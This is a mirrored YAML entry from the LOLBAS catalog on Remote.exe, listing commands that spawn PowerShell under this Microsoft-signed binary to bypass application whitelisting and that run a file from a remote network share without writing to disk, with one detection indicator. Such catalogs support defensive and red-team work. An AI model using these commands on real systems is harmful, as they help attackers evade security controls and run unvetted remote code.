mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-09-20 18:52:13 +02:00
43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
|
---
|
||
|
|
Name: Remote.exe
|
||
|
|
Description: Allows you to run command-line programs on remote computers
|
||
|
|
Author: mr.d0x
|
||
|
|
Created: 1/6/2021
|
||
|
|
Commands:
|
||
|
|
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||
|
|
Description: Spawns powershell as a child process of remote.exe
|
||
|
|
Usecase: Executes a process under a trusted Microsoft signed binary
|
||
|
|
Category: AWL Bypass
|
||
|
|
Privileges: User
|
||
|
|
MitreID:
|
||
|
|
MitreLink:
|
||
|
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10
|
||
|
|
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||
|
|
Description: Spawns powershell as a child process of remote.exe
|
||
|
|
Usecase: Executes a process under a trusted Microsoft signed binary
|
||
|
|
Category: Execute
|
||
|
|
Privileges: User
|
||
|
|
MitreID:
|
||
|
|
MitreLink:
|
||
|
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10
|
||
|
|
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
|
||
|
|
Description: Run a remote file
|
||
|
|
Usecase: Avoiding any writes to disk
|
||
|
|
Category: Execute
|
||
|
|
Privileges: User
|
||
|
|
MitreID:
|
||
|
|
MitreLink:
|
||
|
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10
|
||
|
|
Full_Path:
|
||
|
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
|
||
|
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
|
||
|
|
Code_Sample:
|
||
|
|
- Code:
|
||
|
|
Detection:
|
||
|
|
- IOC: remote.exe spawned
|
||
|
|
Resources:
|
||
|
|
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
|
||
|
|
Acknowledgement:
|
||
|
|
- Person: mr.d0x
|
||
|
|
Handle: '@mrd0x'
|
||
|
|
---
|